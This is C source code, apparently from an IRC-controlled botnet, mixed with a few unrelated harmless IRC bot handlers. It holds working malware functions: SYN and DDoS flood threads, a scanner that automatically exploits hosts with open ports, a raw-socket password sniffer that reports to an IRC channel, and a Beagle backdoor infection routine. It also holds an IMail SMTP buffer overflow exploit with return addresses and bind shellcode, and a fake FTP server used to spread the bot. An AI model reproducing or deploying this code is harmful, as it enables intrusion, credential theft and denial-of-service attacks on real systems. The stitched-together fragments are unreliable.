BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
char buffer[IRCLINE];
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
DWORD entriesread=0,totalread=0,resume=0;
irc_privmsg(sock,chan,"Share name: Resource: Uses: Desc:",notice);
do {
nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
irc_privmsg(sock,chan,buffer,notice,TRUE);
p++;
}
fNetApiBufferFree(pBuf);
} else {
sprintf(buffer,"[NET]: Share list error: %s <%ld>",NasError(nStatus),nStatus);
irc_privmsg(sock,chan,buffer,notice);
}
} while (nStatus == ERROR_MORE_DATA);
if(nStatus != ERROR_SUCCESS)
return FALSE;
return TRUE;
}
DWORD WINAPI FindFileThread(LPVOID param)
{
FFIND ffind = *((FFIND *)param);
FFIND *ffinds = (FFIND *)param;
ffinds->gotinfo = TRUE;
char sendbuf[IRCLINE];
unsigned int numfound = 0;
if (ffind.dirname[strlen(ffind.dirname)-1] == '\\')
ffind.dirname[strlen(ffind.dirname)-1] = '\0';
_snprintf(sendbuf,sizeof(sendbuf),"[FINDFILE]: Searching for file: %s.",ffind.filename);
if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice);
numfound = FindFile(ffind.sock,ffind.chan,ffind.notice,ffind.filename,ffind.dirname,numfound);
sprintf(sendbuf,"[FINDFILE]: Files found: %d.",numfound);
if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice);
addlog(sendbuf);
clearthread(ffind.threadnum);
ExitThread(0);
}
DWORD WINAPI WonkThread(LPVOID param)
{
char sendbuf[IRCLINE];
WONK wonk = *((WONK *)param);
WONK *wonks = (WONK *)param;
wonks->gotinfo = TRUE;
sprintf(sendbuf, "-\x03\x34\2wonk\2\x03- Done with flood, ports hit: %s", SendPhatWonk(finet_addr(wonk.ip), atoi(wonk.length), atoi(wonk.delay)));
if (!wonk.silent) irc_privmsg(wonk.sock, wonk.chan, sendbuf, wonk.notice);
addlog(sendbuf);
clearthread(wonk.threadnum);
ExitThread(0);
}
DWORD WINAPI SuperSynThread(LPVOID param)
{
char sendbuf[IRCLINE];
SUPERSYN supersyn = *((SUPERSYN *)param);
SUPERSYN *supersyns = (SUPERSYN *)param;
supersyns->gotinfo = TRUE;
sprintf(sendbuf, "4<<12[SUPERSYN]: Done with flood (%iKB/sec)4>>", SuperSyn(supersyn.ip, supersyn.port, supersyn.length));
if (!supersyn.silent) irc_privmsg(supersyn.sock, supersyn.chan, sendbuf, supersyn.notice);
addlog(sendbuf);
clearthread(supersyn.threadnum);
ExitThread(0);
}
DWORD WINAPI SkySynThread(LPVOID param)
{
char sendbuf[IRCLINE];
SKYSYN skysyn = *((SKYSYN *)param);
SKYSYN *skysyns = (SKYSYN *)param;
skysyns->gotinfo = TRUE;
sprintf(sendbuf, "-\x03\x34\2skysyn\2\x03- Done with flood (%iKB/sec)", SkySyn(skysyn.ip, skysyn.port, skysyn.length));
if (!skysyn.silent) irc_privmsg(skysyn.sock, skysyn.chan, sendbuf, skysyn.notice);
addlog(sendbuf);
clearthread(skysyn.threadnum);
ExitThread(0);
}
DWORD WINAPI SynFloodThread(LPVOID param)
{
char sendbuf[IRCLINE];
SYNFLOOD synflood = *((SYNFLOOD *)param);
SYNFLOOD *synfloods = (SYNFLOOD *)param;
synfloods->gotinfo = TRUE;
sprintf(sendbuf, "[SYN]: Done with flood (%iKB/sec).", SynFlood(synflood.ip, synflood.port, synflood.length));
if (!synflood.silent) irc_privmsg(synflood.sock, synflood.chan, sendbuf, synflood.notice);
addlog(sendbuf);
clearthread(synflood.threadnum);
ExitThread(0);
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
void stopthread(SOCKET sock, char *chan, BOOL notice, BOOL silent, char *name, char *desc, int threadid, char *thread)
{
char sendbuf[IRCLINE];
int threadnum=0, i;
if(thread)
threadnum=atoi(thread);
if ((i=killthreadid(threadid,threadnum)) > 0)
sprintf(sendbuf,"%s: %s stopped. (%d thread(s) stopped.)", name, desc, i);
else
sprintf(sendbuf,"%s: No %s thread found.", name, desc);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
addlog(sendbuf);
return;
}
static bool
handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
if (strstr(msg->text, IRC_NICK ": ") == msg->text && msg->chan[0] == '#') {
char *head = msg->text + strlen(IRC_NICK) + 2;
if (strstr(head, "record ") == head) {
handle_cmd_record(fd, msg, head + 7);
} else if (strstr(head, "records ") == head) {
handle_cmd_records(fd, msg, head + 8);
} else {
irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);
}
}
return true;
}
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
{
char sendbuf[IRCLINE];
if (findthreadid(SCAN_THREAD) > 0) {
IN_ADDR in;
in.s_addr = advinfo[threadnum].ip;
sprintf(sendbuf, "%s Current IP: %s",mn_title,finet_ntoa(in));
} else
sprintf(sendbuf ,"%s Scan not active.",mn_title);
irc_privmsg(sock, chan, sendbuf, notice);
addlog(sendbuf);
return;
}
DWORD WINAPI DDOSThread(LPVOID param)
{
char sendbuf[IRCLINE];
DDOST ddos = *((DDOST *)param);
DDOST *ddoss = (DDOST *)param;
ddoss->gotinfo = TRUE;
srand(GetTickCount());
sprintf(sendbuf, "[DDoS]: Done with flood (%iKB/sec).", DDOSAttack(ddos.ip, ddos.port, ddos.type, ddos.length));
if (!ddos.silent) irc_privmsg(ddos.socket, ddos.chan, sendbuf, ddos.notice);
addlog(sendbuf);
clearthread(ddos.threadnum);
ExitThread(0);
}
void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
{
char buffer[IRCLINE], buffer2[IRCLINE];
int extotal = 0;
sprintf(buffer, "%s",mn_title);
for(int i=0; exploit[i].port != 0; i++) {
extotal += exploit[i].stats;
sprintf(buffer2,"[%s]: %d,",exploit[i].name,exploit[i].stats);
strncat(buffer, buffer2, sizeof(buffer));
}
sprintf(buffer2, "Total: %d in %s", extotal, Uptime(started));
strncat(buffer, buffer2, sizeof(buffer));
irc_privmsg(sock, chan, buffer, notice);
addlog(buffer);
return;
}
int reply(info_t * in) {
time_t now = time(NULL);
int i, j;
if (helloinfo.last + helloinfo.interval > now)
return 0;
if (in->cmd == cmd_privmsg) {
in->tail = skip_nick(in->tail, in->me);
for (i = 0; i < helloinfo.ntrigger; i++) {
if (!regex(in->tail, helloinfo.trigger[i])) {
if(rrand(helloinfo.odds) > 0)
return 1;
irc_privmsg(to_sender(in), "%s",
helloinfo.reply[rrand(helloinfo.nreply)]);
helloinfo.last = now;
}
}
}
return 0;
}
DWORD WINAPI FtpTransThread(LPVOID param)
{
char sendbuf[IRCLINE];
FTPTRANS ftptrans = *((FTPTRANS *)param);
FTPTRANS *ftptranss = (FTPTRANS *)param;
ftptranss->gotinfo = TRUE;
HANDLE IntConn = fInternetConnect(ih, ftptrans.host, INTERNET_DEFAULT_FTP_PORT,
ftptrans.username, ftptrans.password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
Sleep(1000);
if (IntConn) {
if (ftptrans.get) {
if (fFtpGetFile(IntConn, ftptrans.remote, ftptrans.local, FALSE, FILE_ATTRIBUTE_NORMAL,
FTP_TRANSFER_TYPE_UNKNOWN | INTERNET_FLAG_RELOAD, 0))
_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful download of: %s/%s to: %s.",
ftptrans.host, ftptrans.remote, ftptrans.local);
else
_snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
} else {
if (fFtpPutFile(IntConn, ftptrans.local, ftptrans.remote, FTP_TRANSFER_TYPE_UNKNOWN, 0))
_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful upload of: %s to: %s/%s.",
ftptrans.local, ftptrans.host, ftptrans.remote);
else
_snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
}
} else
_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Error: Failed to connect (invalid hostname or user account).");
if (!ftptrans.silent) irc_privmsg(ftptrans.sock,ftptrans.chan,sendbuf,ftptrans.notice);
addlog(sendbuf);
fInternetCloseHandle(IntConn);
clearthread(ftptrans.threadnum);
ExitThread(0);
}
static bool
handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
// Only handle messages directed at the bot.
if (strncmp(msg->text, IRC_NICK, strlen(IRC_NICK)) != 0)
return true;
// Only handle messages in a channel.
if (msg->chan[0] != '#')
return true;
char *cmd = msg->text + strlen(IRC_NICK ": ");
if (BeginsWith(cmd, "help"))
return handle_cmd_help(fd, msg, head + 4);
if (BeginsWith(cmd, "record "))
return handle_cmd_record(fd, msg, head + 7);
if (BeginsWith(cmd, "records "))
return handle_cmd_records(fd, msg, head + 8);
irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);
return true;
}
int reply(info_t * in) {
int remain;
char buf[512];
if (in->cmd == cmd_privmsg) {
in->tail = skip_nick(in->tail, in->me);
if(!tail_cmd(&in->tail, "fortune")
&& randomline(buf, sizeof(buf)) != NULL) {
if(time(NULL) - lasttime >= req_delay) {
irc_privmsg(to_sender(in), "%s", buf);
lasttime = time(NULL);
} else {
remain = req_delay - (time(NULL) - lasttime);
if(remain > 3600)
irc_notice(in->sender_nick, "Please wait %d hours.", remain / 3600);
else if(remain > 60)
irc_notice(in->sender_nick, "Please wait %d minutes.", remain / 60);
else
irc_notice(in->sender_nick, "Please wait %d seconds.", remain);
}
}
}
return 0;
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
sprintf(buffer,"Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvPortScanner(LPVOID param)
{
IN_ADDR in;
char logbuf[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->cgotinfo = TRUE;
int threadnum=scan.cthreadnum;
int threadid=scan.cthreadid;
srand(GetTickCount());
while (advinfo[threads[threadnum].parent].info) {
DWORD dwIP;
if (scan.random)
dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
else
dwIP = AdvGetNextIP(threads[threadnum].parent);
in.s_addr = dwIP;
sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
sprintf(threads[threadnum].name, logbuf);
if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
if (scan.exploit == -1) {
EnterCriticalSection(&CriticalSection);
sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
if (!scan.silent) {
if (scan.msgchan[0] != '\0')
irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
else
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
}
addlog(logbuf);
LeaveCriticalSection(&CriticalSection);
} else {
EXINFO exinfo;
sprintf(exinfo.ip, finet_ntoa(in));
sprintf(exinfo.command, exploit[scan.exploit].command);
if (scan.msgchan[0] != '\0')
sprintf(exinfo.chan, scan.msgchan);
else
sprintf(exinfo.chan, scan.chan);
exinfo.sock = scan.sock;
exinfo.notice = scan.notice;
exinfo.silent = scan.silent;
exinfo.port = scan.port;
exinfo.threadnum = threadnum;
exinfo.exploit = scan.exploit;
exploit[scan.exploit].exfunc(exinfo);
}
}
Sleep(2000);
}
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
unsigned int __stdcall ipswitch_exploit(void *param, char *target, const char *host)
{
struct exploits exploit = *(struct exploits *)param;
struct exploits *pexploit = (struct exploits *)param;
pexploit->gotinfo = true;
static char overflow[1028];
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int plen, i;
//JMP = atoi("1");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
//fprintf(stderr, "Error setting up with WinSock v1.1\n");
return false;
}
hp = gethostbyname(host);
if (hp == NULL) {
//printf("ERROR: Uknown host %s\n", exploit.ip);
//printf("%s",exploit.ip);
return false;
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(exploit.port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) {
//printf("ERROR: Socket Error\n");
return false;
}
if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) {
//printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
return false;;
}
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) {
//printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
return false;
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL) {
//printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
return false;
}
// JMP to EAX = Results in a Corrupted Stack
// so instead we POP EBP, RET to restore pointer and then return
// this causes code procedure to continue
/*
['IMail 8.x Universal', 0x10036f71 ],
['Windows 2003 SP1 English', 0x7c87d8af ],
['Windows 2003 SP0 English', 0x77d5c14c ],
['Windows XP SP2 English', 0x7c967e23 ],
['Windows XP SP1 English', 0x71ab389c ],
['Windows XP SP0 English', 0x71ab389c ],
['Windows 2000 Universal English', 0x75021397 ],
['Windows 2000 Universal French', 0x74fa1397],
['Windows XP SP1 - SP2 German', 0x77d18c14],
*/
char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and :
char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71
char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c
char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397
char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397
char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14
char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work.
// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
// After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works
// On all versions from 8.x to 2006 (9.x?)
char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload.
memset(overflow, 0, 1028);
strcat(overflow, Exp);
strcat(overflow, IMail815);
strcat(overflow, Win2k3SP1E);
strcat(overflow, WinXPSP1);
strcat(overflow, Win2KE);
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "\x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
// Dont forget to add the trailing characters to set up stack overflow
strcat(overflow, tail);
// Connect to SMTP Server and Setup Up Email
char EHLO[] = "EHLO \r\n";
char MF[] = "MAIL FROM <TEST@TEST> \r\n";
send(sockfd, EHLO, strlen(EHLO), 0);
Sleep(1000);
send(sockfd, MF, strlen(MF), 0);
Sleep(1000);
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
//printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
return false;
}
closesocket(sockfd);
WSACleanup();
Sleep(1000);
closesocket(sockfd);
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(exploit.port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
return false;
}
if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR)
{
closesocket(sockfd);
WSACleanup();
}
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
closesocket(sockfd);
WSACleanup();
}
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
closesocket(sockfd);
WSACleanup();
}
closesocket(sockfd);
WSACleanup();
shell_connect(exploit.ip, 6236); {
irc_privmsg(target, "Exploiting IP: %s", exploit.ip);
closesocket(sockfd);
_endthreadex(0);
return true;
}
return false;
}
void CheckDLLs(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (nokernel32) {
sprintf(sendbuf,"Kernel32.dll failed. <%d>", nokernel32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nouser32) {
sprintf(sendbuf,"User32.dll failed. <%d>", nouser32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (noadvapi32) {
sprintf(sendbuf,"Advapi32.dll failed. <%d>", noadvapi32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nogdi32) {
sprintf(sendbuf,"Gdi32.dll failed. <%d>", nogdi32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nows2_32) {
sprintf(sendbuf,"Ws2_32.dll failed. <%d>", nows2_32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nowininet) {
sprintf(sendbuf,"Wininet.dll failed. <%d>", nowinineterr);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (noicmp) {
sprintf(sendbuf,"Icmp.dll failed. <%d>", noicmperr);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nonetapi32) {
sprintf(sendbuf,"Netapi32.dll failed. <%d>", nonetapi32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nodnsapi) {
sprintf(sendbuf,"Dnsapi.dll failed. <%d>", nodnsapierr);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (noiphlpapi) {
sprintf(sendbuf,"Iphlpapi.dll failed. <%d>", noiphlpapierr);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (nompr) {
sprintf(sendbuf,"Mpr32.dll failed. <%d>", nomprerr);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (noshell32) {
sprintf(sendbuf,"Shell32.dll failed. <%d>", noshell32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
if (noodbc32) {
sprintf(sendbuf,"Odbc32.dll failed. <%d>", noodbc32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
#ifndef NO_CAPTURE
if (noavicap32) {
sprintf(sendbuf,"Avicap32.dll failed. <%d>", noavicap32err);
irc_privmsg(sock, chan, sendbuf, notice);
}
#endif
sprintf(sendbuf,"[MAIN]: DLL test complete.");
if (!silent) irc_privmsg(sock, chan, sendbuf, notice);
addlog(sendbuf);
return;
}
DWORD WINAPI ftpd(LPVOID pParam) {
WSADATA wsdata;
SOCKET listener;
SOCKET newfd;
char sendbuf[IRCLINE];
struct sockaddr_in server_address;
struct sockaddr_in remoteaddr;
long h;
int reuse_addr = 1;
unsigned long mode = 1;
int fdmax;
int i;
int addrlen;
int nbytes;
char buf[100];
// char t_buf[1024];
char tmpbuf[100];
char tmpbuf2[100];
char a[4];
char b[4];
char c[4];
char d[4];
char p1[50];
char p2[50];
char tmpip[15];
int po,po2;
FTP ftp = *((FTP *)pParam);
FTP *ftps = (FTP *)pParam;
ftps->gotinfo = TRUE;
struct fd_set master; // master file descriptor list
struct fd_set read_fds; // temp file descriptor list for select()
FD_ZERO(&master); // clear the master and temp sets
FD_ZERO(&read_fds);
WSAStartup(0x0101, &wsdata);
srand(time(NULL));
FTP_PORT = brandom(1030,65200);
listener = socket(AF_INET, SOCK_STREAM, 0);
setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, (char*)&reuse_addr,sizeof(reuse_addr));
ioctlsocket(listener, FIONBIO, &mode);
server_address.sin_family = AF_INET;
server_address.sin_addr.s_addr = INADDR_ANY;
server_address.sin_port = htons(FTP_PORT);
if (bind(listener, (struct sockaddr *) &server_address,sizeof(server_address)) < 0 ) {
return 1;
}
listen(listener,10);
FD_SET(listener, &master);
fdmax = listener;
while(1) {
read_fds = master;
if (select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1) {
return 1;
}
for(i = 0; i <= fdmax; i++) {
memset(buf,0,sizeof(buf));
memset(tmpbuf,0,sizeof(tmpbuf));
if (FD_ISSET(i, &read_fds)) {
if (i == (int)listener) {
addrlen = sizeof(remoteaddr);
if ((newfd = accept(listener, (struct sockaddr *)&remoteaddr,&addrlen)) != -1) {
FD_SET(newfd, &master);
if ((int)newfd > fdmax) {
fdmax = newfd;
}
send(newfd, "220 NzmxFtpd 0wns j0\n",21 , 0);
}
} else {
if ((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0) {
FD_CLR(i, &master);
closesocket(i);
} else {
sscanf(buf,"%s %s",tmpbuf,tmpbuf2);
if (strcmp(tmpbuf,"USER") == 0) {
send(i,"331 Password required\n",22 , 0);
}
else if (strcmp(tmpbuf,"PASS") == 0) {
send(i,"230 User logged in.\n",20 , 0);
}
else if (strcmp(tmpbuf,"SYST") == 0) {
send(i,"215 NzmxFtpd\n",13 , 0);
}
else if (strcmp(tmpbuf,"REST") == 0) {
send(i,"350 Restarting.\n",16 , 0);
}
else if (strcmp(tmpbuf,"PWD") == 0) {
send(i,"257 \"/\" is current directory.\n",30 , 0);
}
else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"A") == 0)) {
send(i,"200 Type set to A.\n",19 , 0);
}
else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"I") == 0)) {
send(i,"200 Type set to I.\n",19 , 0);
}
else if (strcmp(tmpbuf,"PASV") == 0) {
char pasv[] = "425 Passive not supported on this server\n";
send(i, pasv, strlen(pasv), 0);
}
else if (strcmp(tmpbuf,"LIST") == 0) {
char list[] = "226 Transfer complete\n";
send(i, list, strlen(list), 0);
}
else if (strcmp(tmpbuf,"PORT") == 0) {
sscanf(buf,"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]",a,b,c,d,p1,p2);
po = atoi(p1);
po2 = atoi(p2);
memset(p1,0,sizeof(p1));
sprintf(p1,"%x%x\n",po,po2);
h = strtoul(p1, NULL, 16);
sprintf(tmpip,"%s.%s.%s.%s",a,b,c,d);
send(i,"200 PORT command successful.\n",29 , 0);
}
else if (strcmp(tmpbuf,"RETR") == 0) {
